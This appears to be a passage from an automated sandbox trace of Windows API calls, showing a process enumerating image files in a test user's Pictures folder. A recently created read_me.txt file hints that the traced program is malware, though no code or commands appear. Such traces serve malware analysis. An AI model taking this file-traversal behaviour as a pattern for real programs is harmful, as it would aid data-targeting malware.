wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\..") returned 45 [0075.829] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.830] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc71ca650, ftCreationTime.dwHighDateTime=0x1d4c9ee, ftLastAccessTime.dwLowDateTime=0xf8091290, ftLastAccessTime.dwHighDateTime=0x1d4d56e, ftLastWriteTime.dwLowDateTime=0xf8091290, ftLastWriteTime.dwHighDateTime=0x1d4d56e, nFileSizeHigh=0x0, nFileSizeLow=0x7be3, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="-NviZXX.png", cAlternateFileName="")) returned 1 [0075.830] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\-NviZXX.png") returned 54 [0075.830] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19ebe920, ftCreationTime.dwHighDateTime=0x1d4cb45, ftLastAccessTime.dwLowDateTime=0x8abb59f0, ftLastAccessTime.dwHighDateTime=0x1d4ca9c, ftLastWriteTime.dwLowDateTime=0x8abb59f0, ftLastWriteTime.dwHighDateTime=0x1d4ca9c, nFileSizeHigh=0x0, nFileSizeLow=0x89ed, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="0PjZJ2x_.png", cAlternateFileName="")) returned 1 [0075.830] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\0PjZJ2x_.png") returned 55 [0075.830] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xacd98fe0, ftCreationTime.dwHighDateTime=0x1d4c6d5, ftLastAccessTime.dwLowDateTime=0x86014690, ftLastAccessTime.dwHighDateTime=0x1d4ca97, ftLastWriteTime.dwLowDateTime=0x86014690, ftLastWriteTime.dwHighDateTime=0x1d4ca97, nFileSizeHigh=0x0, nFileSizeLow=0xe428, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="22d0g9LYY-eR.png", cAlternateFileName="22D0G9~1.PNG")) returned 1 [0075.830] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\22d0g9LYY-eR.png") returned 59 [0075.830] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7040f0e0, ftCreationTime.dwHighDateTime=0x1d4c604, ftLastAccessTime.dwLowDateTime=0x6b45c660, ftLastAccessTime.dwHighDateTime=0x1d4cf82, ftLastWriteTime.dwLowDateTime=0x6b45c660, ftLastWriteTime.dwHighDateTime=0x1d4cf82, nFileSizeHigh=0x0, nFileSizeLow=0xbb98, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="3q833.gif", cAlternateFileName="")) returned 1 [0075.830] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3q833.gif") returned 52 [0075.830] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69bc7840, ftCreationTime.dwHighDateTime=0x1d4c9e5, ftLastAccessTime.dwLowDateTime=0xfaff2110, ftLastAccessTime.dwHighDateTime=0x1d4d08c, ftLastWriteTime.dwLowDateTime=0xfaff2110, ftLastWriteTime.dwHighDateTime=0x1d4d08c, nFileSizeHigh=0x0, nFileSizeLow=0x14388, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="4m4dkna2MBvFQv.bmp", cAlternateFileName="4M4DKN~1.BMP")) returned 1 [0075.830] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4m4dkna2MBvFQv.bmp") returned 61 [0075.830] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88f6e80, ftCreationTime.dwHighDateTime=0x1d4d302, ftLastAccessTime.dwLowDateTime=0x50015230, ftLastAccessTime.dwHighDateTime=0x1d4c85b, ftLastWriteTime.dwLowDateTime=0x50015230, ftLastWriteTime.dwHighDateTime=0x1d4c85b, nFileSizeHigh=0x0, nFileSizeLow=0xf0b4, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="7wJHk8IduLqY3JbXiKSR.png", cAlternateFileName="7WJHK8~1.PNG")) returned 1 [0075.830] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7wJHk8IduLqY3JbXiKSR.png") returned 67 [0075.830] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6f8b800, ftCreationTime.dwHighDateTime=0x1d4d060, ftLastAccessTime.dwLowDateTime=0xfe8c6ad0, ftLastAccessTime.dwHighDateTime=0x1d4ca1b, ftLastWriteTime.dwLowDateTime=0xfe8c6ad0, ftLastWriteTime.dwHighDateTime=0x1d4ca1b, nFileSizeHigh=0x0, nFileSizeLow=0x53d9, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="8JbgwF.gif", cAlternateFileName="")) returned 1 [0075.830] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8JbgwF.gif") returned 53 [0075.830] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3911d010, ftCreationTime.dwHighDateTime=0x1d4c6a1, ftLastAccessTime.dwLowDateTime=0x1a446850, ftLastAccessTime.dwHighDateTime=0x1d4d0f6, ftLastWriteTime.dwLowDateTime=0x1a446850, ftLastWriteTime.dwHighDateTime=0x1d4d0f6, nFileSizeHigh=0x0, nFileSizeLow=0x6bc5, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="AAaKgAadS-cz 6.bmp", cAlternateFileName="AAAKGA~1.BMP")) returned 1 [0075.830] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AAaKgAadS-cz 6.bmp") returned 61 [0075.830] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70fcf6b0, ftCreationTime.dwHighDateTime=0x1d4d422, ftLastAccessTime.dwLowDateTime=0x58b64da0, ftLastAccessTime.dwHighDateTime=0x1d4d1e7, ftLastWriteTime.dwLowDateTime=0x58b64da0, ftLastWriteTime.dwHighDateTime=0x1d4d1e7, nFileSizeHigh=0x0, nFileSizeLow=0xe55, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="BCq5.jpg", cAlternateFileName="")) returned 1 [0075.830] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BCq5.jpg") returned 51 [0075.830] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcea7910, ftCreationTime.dwHighDateTime=0x1d4cec1, ftLastAccessTime.dwLowDateTime=0xc17c87c0, ftLastAccessTime.dwHighDateTime=0x1d4cd62, ftLastWriteTime.dwLowDateTime=0xc17c87c0, ftLastWriteTime.dwHighDateTime=0x1d4cd62, nFileSizeHigh=0x0, nFileSizeLow=0xd599, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="BjEx3.gif", cAlternateFileName="")) returned 1 [0075.830] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BjEx3.gif") returned 52 [0075.830] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0075.830] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini") returned 54 [0075.830] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2adefbe0, ftCreationTime.dwHighDateTime=0x1d4d073, ftLastAccessTime.dwLowDateTime=0x5f569f80, ftLastAccessTime.dwHighDateTime=0x1d4d123, ftLastWriteTime.dwLowDateTime=0x5f569f80, ftLastWriteTime.dwHighDateTime=0x1d4d123, nFileSizeHigh=0x0, nFileSizeLow=0x12708, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="dxIPtsp3JyR.jpg", cAlternateFileName="DXIPTS~1.JPG")) returned 1 [0075.830] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dxIPtsp3JyR.jpg") returned 58 [0075.830] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b941a30, ftCreationTime.dwHighDateTime=0x1d4ccfa, ftLastAccessTime.dwLowDateTime=0xeda5f940, ftLastAccessTime.dwHighDateTime=0x1d4c7c1, ftLastWriteTime.dwLowDateTime=0xeda5f940, ftLastWriteTime.dwHighDateTime=0x1d4c7c1, nFileSizeHigh=0x0, nFileSizeLow=0x65f7, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="EWm lGhs9RzKDH.bmp", cAlternateFileName="EWMLGH~1.BMP")) returned 1 [0075.830] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\EWm lGhs9RzKDH.bmp") returned 61 [0075.830] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1368420, ftCreationTime.dwHighDateTime=0x1d4d117, ftLastAccessTime.dwLowDateTime=0x6bfbf370, ftLastAccessTime.dwHighDateTime=0x1d4ccc3, ftLastWriteTime.dwLowDateTime=0x6bfbf370, ftLastWriteTime.dwHighDateTime=0x1d4ccc3, nFileSizeHigh=0x0, nFileSizeLow=0x27e0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="f0-kIY.bmp", cAlternateFileName="")) returned 1 [0075.830] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\f0-kIY.bmp") returned 53 [0075.830] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1611930, ftCreationTime.dwHighDateTime=0x1d4ced7, ftLastAccessTime.dwLowDateTime=0xd9858680, ftLastAccessTime.dwHighDateTime=0x1d4d57a, ftLastWriteTime.dwLowDateTime=0xd9858680, ftLastWriteTime.dwHighDateTime=0x1d4d57a, nFileSizeHigh=0x0, nFileSizeLow=0x17b79, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="f7hWfjYSu5W3Q.gif", cAlternateFileName="F7HWFJ~1.GIF")) returned 1 [0075.830] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\f7hWfjYSu5W3Q.gif") returned 60 [0075.830] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fb4e640, ftCreationTime.dwHighDateTime=0x1d4d4bf, ftLastAccessTime.dwLowDateTime=0x1d854d30, ftLastAccessTime.dwHighDateTime=0x1d4d0cf, ftLastWriteTime.dwLowDateTime=0x1d854d30, ftLastWriteTime.dwHighDateTime=0x1d4d0cf, nFileSizeHigh=0x0, nFileSizeLow=0xb9cb, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="GLq9ajQYOkYMyeyrKasw.gif", cAlternateFileName="GLQ9AJ~1.GIF")) returned 1 [0075.830] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GLq9ajQYOkYMyeyrKasw.gif") returned 67 [0075.831] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c2c5460, ftCreationTime.dwHighDateTime=0x1d4c7f1, ftLastAccessTime.dwLowDateTime=0xa1775c20, ftLastAccessTime.dwHighDateTime=0x1d4cbaa, ftLastWriteTime.dwLowDateTime=0xa1775c20, ftLastWriteTime.dwHighDateTime=0x1d4cbaa, nFileSizeHigh=0x0, nFileSizeLow=0x1142d, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="IeUcz.bmp", cAlternateFileName="")) returned 1 [0075.831] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IeUcz.bmp") returned 52 [0075.831] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbe4190, ftCreationTime.dwHighDateTime=0x1d4cf76, ftLastAccessTime.dwLowDateTime=0x97973a70, ftLastAccessTime.dwHighDateTime=0x1d4d372, ftLastWriteTime.dwLowDateTime=0x97973a70, ftLastWriteTime.dwHighDateTime=0x1d4d372, nFileSizeHigh=0x0, nFileSizeLow=0x4f00, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="iIRcF_.jpg", cAlternateFileName="")) returned 1 [0075.831] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iIRcF_.jpg") returned 53 [0075.831] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5efb1ed0, ftCreationTime.dwHighDateTime=0x1d4c91c, ftLastAccessTime.dwLowDateTime=0x6d052b80, ftLastAccessTime.dwHighDateTime=0x1d4ce83, ftLastWriteTime.dwLowDateTime=0x6d052b80, ftLastWriteTime.dwHighDateTime=0x1d4ce83, nFileSizeHigh=0x0, nFileSizeLow=0x2226, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="jqGW9rBdkPhNCoa8pfh.png", cAlternateFileName="JQGW9R~1.PNG")) returned 1 [0075.831] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\jqGW9rBdkPhNCoa8pfh.png") returned 66 [0075.831] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9885ed0, ftCreationTime.dwHighDateTime=0x1d4d48c, ftLastAccessTime.dwLowDateTime=0x25929550, ftLastAccessTime.dwHighDateTime=0x1d4ce86, ftLastWriteTime.dwLowDateTime=0x25929550, ftLastWriteTime.dwHighDateTime=0x1d4ce86, nFileSizeHigh=0x0, nFileSizeLow=0x146f9, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="j_wmVI32CgzzP5.bmp", cAlternateFileName="J_WMVI~1.BMP")) returned 1 [0075.831] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j_wmVI32CgzzP5.bmp") returned 61 [0075.831] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9a21150, ftCreationTime.dwHighDateTime=0x1d4cefa, ftLastAccessTime.dwLowDateTime=0x64172600, ftLastAccessTime.dwHighDateTime=0x1d4ca9a, ftLastWriteTime.dwLowDateTime=0x64172600, ftLastWriteTime.dwHighDateTime=0x1d4ca9a, nFileSizeHigh=0x0, nFileSizeLow=0xcd3, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="k3qQOB5vZaWyPRMgI7n.bmp", cAlternateFileName="K3QQOB~1.BMP")) returned 1 [0075.831] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\k3qQOB5vZaWyPRMgI7n.bmp") returned 66 [0075.831] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa06fb000, ftCreationTime.dwHighDateTime=0x1d4d485, ftLastAccessTime.dwLowDateTime=0x3eeb5210, ftLastAccessTime.dwHighDateTime=0x1d4c636, ftLastWriteTime.dwLowDateTime=0x3eeb5210, ftLastWriteTime.dwHighDateTime=0x1d4c636, nFileSizeHigh=0x0, nFileSizeLow=0x16c53, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="LmYaBDzuYd2.png", cAlternateFileName="LMYABD~1.PNG")) returned 1 [0075.831] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LmYaBDzuYd2.png") returned 58 [0075.831] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73390600, ftCreationTime.dwHighDateTime=0x1d4ccb9, ftLastAccessTime.dwLowDateTime=0x406c7c40, ftLastAccessTime.dwHighDateTime=0x1d4cf28, ftLastWriteTime.dwLowDateTime=0x406c7c40, ftLastWriteTime.dwHighDateTime=0x1d4cf28, nFileSizeHigh=0x0, nFileSizeLow=0x18a15, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="NWEWuTjUbC.bmp", cAlternateFileName="NWEWUT~1.BMP")) returned 1 [0075.831] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NWEWuTjUbC.bmp") returned 57 [0075.831] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb813a00, ftCreationTime.dwHighDateTime=0x1d4d0c0, ftLastAccessTime.dwLowDateTime=0x661a1ce0, ftLastAccessTime.dwHighDateTime=0x1d4d559, ftLastWriteTime.dwLowDateTime=0x661a1ce0, ftLastWriteTime.dwHighDateTime=0x1d4d559, nFileSizeHigh=0x0, nFileSizeLow=0xd290, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="OGgxKmIG6X6nh1pvhI.jpg", cAlternateFileName="OGGXKM~1.JPG")) returned 1 [0075.831] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\OGgxKmIG6X6nh1pvhI.jpg") returned 65 [0075.831] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8dcd5d0, ftCreationTime.dwHighDateTime=0x1d4cf7f, ftLastAccessTime.dwLowDateTime=0x70b17cb0, ftLastAccessTime.dwHighDateTime=0x1d4ca88, ftLastWriteTime.dwLowDateTime=0x70b17cb0, ftLastWriteTime.dwHighDateTime=0x1d4ca88, nFileSizeHigh=0x0, nFileSizeLow=0x18fd0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="ouwd6S7yNy.jpg", cAlternateFileName="OUWD6S~1.JPG")) returned 1 [0075.831] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ouwd6S7yNy.jpg") returned 57 [0075.831] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa36b3790, ftCreationTime.dwHighDateTime=0x1d4d226, ftLastAccessTime.dwLowDateTime=0x5bff7820, ftLastAccessTime.dwHighDateTime=0x1d4c976, ftLastWriteTime.dwLowDateTime=0x5bff7820, ftLastWriteTime.dwHighDateTime=0x1d4c976, nFileSizeHigh=0x0, nFileSizeLow=0x154ea, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="POwpC.gif", cAlternateFileName="")) returned 1 [0075.831] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\POwpC.gif") returned 52 [0075.831] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x452ca9d0, ftCreationTime.dwHighDateTime=0x1d4c93d, ftLastAccessTime.dwLowDateTime=0xf6ed5f00, ftLastAccessTime.dwHighDateTime=0x1d4c95d, ftLastWriteTime.dwLowDateTime=0xf6ed5f00, ftLastWriteTime.dwHighDateTime=0x1d4c95d, nFileSizeHigh=0x0, nFileSizeLow=0x8d78, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="RBOkJ4bIa.png", cAlternateFileName="RBOKJ4~1.PNG")) returned 1 [0075.831] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RBOkJ4bIa.png") returned 56 [0075.831] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24822120, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24822120, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24822120, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0075.831] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\read_me.txt") returned 54 [0075.831] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f86a920, ftCreationTime.dwHighDateTime=0x1d4d20d, ftLastAccessTime.dwLowDateTime=0x69191f10, ftLastAccessTime.dwHighDateTime=0x1d4d377, ftLastWriteTime.dwLowDateTime=0x69191f10, ftLastWriteTime.dwHighDateTime=0x1d4d377, nFileSizeHigh=0x0, nFileSizeLow=0x2088, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="ss4Yiq.jpg", cAlternateFileName="")) returned 1 [0075.831] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ss4Yiq.jpg") returned 53 [0075.831] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6d62a10, ftCreationTime.dwHighDateTime=0x1d4d395, ftLastAccessTime.dwLowDateTime=0x4410a670, ftLastAccessTime.dwHighDateTime=0x1d4ca85, ftLastWriteTime.dwLowDateTime=0x4410a670, ftLastWriteTime.dwHighDateTime=0x1d4ca85, nFileSizeHigh=0x0, nFileSizeLow=0xe0fb, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="v2lT.gif", cAlternateFileName="")) returned 1 [0075.831] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\v2lT.gif") returned 51 [0075.831] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46f32f80, ftCreationTime.dwHighDateTime=0x1d4c5fc, ftLastAccessTime.dwLowDateTime=0x422425c0, ftLastAccessTime.dwHighDateTime=0x1d4d567, ftLastWriteTime.dwLowDateTime=0x422425c0, ftLastWriteTime.dwHighDateTime=0x1d4d567, nFileSizeHigh=0x0, nFileSizeLow=0x1689d, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="VU VfXS6Pgn-.png", cAlternateFileName="VUVFXS~1.PNG")) returned 1 [0075.831] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VU VfXS6Pgn-.png") returned 59 [0075.831] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd70c2a0, ftCreationTime.dwHighDateTime=0x1d4d163, ftLastAccessTime.dwLowDateTime=0x9558c570, ftLastAccessTime.dwHighDateTime=0x1d4cf3b, ftLastWriteTime.dwLowDateTime=0x9558c570, ftLastWriteTime.dwHighDateTime=0x1d4cf3b, nFileSizeHigh=0x0, nFileSizeLow=0x883a, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="wl6j0x7NAsiYh97r.bmp", cAlternateFileName="WL6J0X~1.BMP")) returned 1 [0075.831] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\wl6j0x7NAsiYh97r.bmp") returned 63 [0075.832] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5f33d00, ftCreationTime.dwHighDateTime=0x1d4c90e, ftLastAccessTime.dwLowDateTime=0x44783cd0, ftLastAccessTime.dwHighDateTime=0x1d4cb80, ftLastWriteTime.dwLowDateTime=0x44783cd0, ftLastWriteTime.dwHighDateTime=0x1d4cb80, nFileSizeHigh=0x0, nFileSizeLow=0xd8f8, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Yb9uhWzjKs-.png", cAlternateFileName="YB9UHW~1.PNG")) returned 1 [0075.832] wnsprintfW (in: 